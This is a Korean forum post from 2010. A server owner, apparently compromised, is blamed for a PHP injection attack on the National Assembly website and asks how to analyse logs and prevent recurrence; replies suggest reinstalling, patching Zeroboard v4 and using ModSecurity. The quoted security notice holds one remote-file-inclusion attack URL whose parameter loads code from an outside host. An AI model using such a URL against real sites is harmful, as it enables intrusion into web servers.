제서버가 PHP injection 공격을 당해서 제가 국회 홈피를 해킹시도한걸로 오인받았습니다.

쓰기

제서버가 PHP injection 공격을 당해서 제가 국회 홈피를 해킹시도한걸로 오인받았습니다.

2010-01

2010-01-09 01:45:08

조회 8866 추천 0

내용은 아래와 같습니다.

저는 해킹시도한적이 없는데 누가 제서버를 거쳐서 아래와 같이 공격을 시도해서

제가 해킹한걸로 오해를 받고 있습니다.

이거 어떻게 대처해야 될까요?

로그 분석 방법과 재발 대처방법에 대하여 조언을 부탁드립니다(__)

-------------------------------------------------------
KT 스팸대응센터

Tel : 080-223-xxx
E-mail : ***@******.net

----- Original Message -----
From: 국회보안관제센터
To: ***@******.net ; ***@******.net ; ***@*****.kornet.net
Sent: Friday, January 08, 2010 5:07 AM
Subject: KT에 할당된 아이피에서 침해시도가 발생 하였습니다. -국회보안관제센터-

안녕하십니까.

국회 보안관제센터입니다.

KT에 할당된 아이피 125.141.91.xxx에서 국회 웹서버로 PHP injection 공격이 발생 했습니다.

-일시 2010년 1월 8일 오전 3시 6분경

-src IP : 125.141.91.xxx

-dst IP : 211.46.92.xxx

-공격 내용 : PHP인젝션

-공격URL = www.***.go.kr/renew07/anc/notice/popup_mng/popup_vw.j&hellip://skin/sirini_simplism_gallery_v4/setup.php?dir=http://musicadelibreria.net/footer??

상기 내역은 보안상 로그중 일부만 발췌하여 공개 하였으며, src IP에 대해 80포트로 접속 해 본 결과

웹서버로 확인되어 해당 아이피에 대해 차단 하였습니다.

조치 후 회신 요청 드립니다.

수고하십시요.

국회 보안관제센터

02-786-xxxx

짧은글 일수록 신중하게.



투시피유 2010-01 와 정말 황당하시겠네요.. 도움은 못되어 드리지만 잘 해결되길 겁니다. 와 정말 황당하시겠네요.. 도움은 못되어 드리지만 잘 해결되길 겁니다.



푸릉이 2010-01 뭐 그러려니 하면 되지 않을까요? 그쪽에서도 머라고 하지 않는이상...^^ 두발 뻗고 편희 주무세요.. 뭐 그러려니 하면 되지 않을까요? 그쪽에서도 머라고 하지 않는이상...^^ 두발 뻗고 편희 주무세요..



딸기대장 2010-01 국회홈피에 안들어가면 되지않나요? ^^ 국회홈피에 안들어가면 되지않나요? ^^



몽몽 2010-01 리눅스인지 윈도우인지...? 일단 시스템 뚫렸으니 서버가 무결성이 없는 상태입니다. 시스템을 최신 업데이트로 새로 설치하세요. 그리고 서버 보안상 문제발생으로 인한 사고였으며, 미안하며, 즉각 보안조치를 취하였고 , 향후 재발생되지 않도록 하겠다 라는 내용으로 회신해주면 됩니다. 리눅스인지 윈도우인지...? 일단 시스템 뚫렸으니 서버가 무결성이 없는 상태입니다. 시스템을 최신 업데이트로 새로 설치하세요. 그리고 서버 보안상 문제발생으로 인한 사고였으며, 미안하며, 즉각 보안조치를 취하였고 , 향후 재발생되지 않도록 하겠다 라는 내용으로 회신해주면 됩니다.



이현호K 2010-01 Skin도 보이고, v4 가 있는거 보니까, 제로보드 4 url 가지고 장난친듯 하네요. 제로보드 보안 강화하시거나, 업그레이드 하셔야되겠네요. zero v4는 정말 문제 많습니다. 악용소지.. 웹서버 인젝션 공격에 대응하시려면, 웹서버 Firewall ModSecurity를 잘 활용하시는것도 한방법입니다. http://www.modsecurity.org/documentation/ 서버 기본 보안도 철저히 하셔야 누명쓰는 일이 없습니다. Skin도 보이고, v4 가 있는거 보니까, 제로보드 4 url 가지고 장난친듯 하네요. 제로보드 보안 강화하시거나, 업그레이드 하셔야되겠네요. zero v4는 정말 문제 많습니다. 악용소지.. 웹서버 인젝션 공격에 대응하시려면, 웹서버 Firewall ModSecurity를 잘 활용하시는것도 한방법입니다. http://www.modsecurity.org/documentation/ 서버 기본 보안도 철저히 하셔야 누명쓰는 일이 없습니다.

로그인 하시면 댓글을 남길 수 있습니다

쓰기

QnA

쓰기

3791/5680

번호	제목Page 3791/5680	글쓴이	날짜	조회	추천
	(광고) 단통법 시대의 인터넷가입 가이드(ver2.0) (228)	백메가	2015-12	1483287	25
(광고) 단통법 시대의 인터넷가입 가이드(… (228) 2015-12 1483287 1 백메가
	[필독] 처음 오시는 분을 위한 안내 (726)	정은준1	2014-05	4946626	0
[필독] 처음 오시는 분을 위한 안내 (726) 2014-05 4946626 1 정은준1
37793	ITX 보드에 전원을 넣을려고 합니다. (11)	민경열	2023-05	1984	0
ITX 보드에 전원을 넣을려고 합니다. (11) 2023-05 1984 1 민경열
37792	온보드 레이드 질문 합니다. (4)	초보IT	2015-12	3416	0
온보드 레이드 질문 합니다. (4) 2015-12 3416 1 초보IT
37791	대형시계 시간... (5)	Won낙연	2019-03	2691	0
대형시계 시간... (5) 2019-03 2691 1 Won낙연
37790	여친차 긁었습니다. (5)	푸릉이	2009-12	8159	0
여친차 긁었습니다. (5) 2009-12 8159 1 푸릉이
37789	유한요소해석용 컴퓨터 질문입니다 (8)	닉네임12345	2020-06	3949	0
유한요소해석용 컴퓨터 질문입니다 (8) 2020-06 3949 1 닉네임12345
37788	ID도용 문의 (6)	user	2014-09	4256	0
ID도용 문의 (6) 2014-09 4256 1 user
37787	W3680 대신 X5680으로 교환해도 될까요 (5)	사과장수	2016-12	5551	0
W3680 대신 X5680으로 교환해도 될까요 (5) 2016-12 5551 1 사과장수
37786	[비컴] 아파트 천장형 빨래건조대봉 교환가능한지요? (10)	원주멋진덩치	2020-06	3681	0
[비컴] 아파트 천장형 빨래건조대봉 교환… (10) 2020-06 3681 1 원주멋진덩치
37785	esxi 데이터 스토어가 하나가 증발했습니다.. (10)	송진현	2014-09	5286	0
esxi 데이터 스토어가 하나가 증발했습니… (10) 2014-09 5286 1 송진현
37784	제서버가 PHP injection 공격을 당해서 제가 국회 홈피를 해킹시도한걸로 오인받았습… (5)	박병희	2010-01	8867	0
제서버가 PHP injection 공격을 당해서 제… (5) 2010-01 8867 1 박병희
37783	삼성 매직스테이션 SPC8260P BIOS 업데이트 후 벽돌이라 ROM 라이팅 가능한 곳 요청… (9)	아스란	2020-06	5393	0
삼성 매직스테이션 SPC8260P BIOS 업데이… (9) 2020-06 5393 1 아스란
37782	서버의 핑 응답 (2)	김황중	2023-06	1987	0
서버의 핑 응답 (2) 2023-06 1987 1 김황중
37781	2670 v1 과 2675v3 고민되네요 (23)	라온제나	2016-01	5812	0
2670 v1 과 2675v3 고민되네요 (23) 2016-01 5812 1 라온제나
37780	전자회로, 마이크로 컨트롤러, 코딩 등을 배우려면 어떤 책이나 강좌, 사이트를 참고… (12)	안규민	2019-04	3364	0
전자회로, 마이크로 컨트롤러, 코딩 등을 … (12) 2019-04 3364 1 안규민
37779	에러메세지 인가본데요 (13)	전진	2023-06	1910	0
에러메세지 인가본데요 (13) 2023-06 1910 1 전진
37778	Q1900에 ESXi 설치 관련 문제 (2)	벼리아빠	2014-09	7139	0
Q1900에 ESXi 설치 관련 문제 (2) 2014-09 7139 1 벼리아빠
37777	오래된 모니터가 늦게 켜지는 문제와 한쪽 스피커말썽. (2)	김제l김용환	2020-06	3840	0
오래된 모니터가 늦게 켜지는 문제와 한쪽… (2) 2020-06 3840 1 김제l김용환
37776	전파인증제 강화로 인해 영향을 받은 해당 제품이 어떤것들이 있나요? (2)	구름빵	2014-09	3730	0
전파인증제 강화로 인해 영향을 받은 해당… (2) 2014-09 3730 1 구름빵
37775	G31T-M7(v1.0) 개조바이오스 미리 올려두어도 상관 없나요? (3)	먹보	2016-01	3728	0
G31T-M7(v1.0) 개조바이오스 미리 올려두… (3) 2016-01 3728 1 먹보
37774	cctv화질과 poe 스위치 연결가능성 (9)	negativete	2020-06	3272	0
cctv화질과 poe 스위치 연결가능성 (9) 2020-06 3272 1 negativete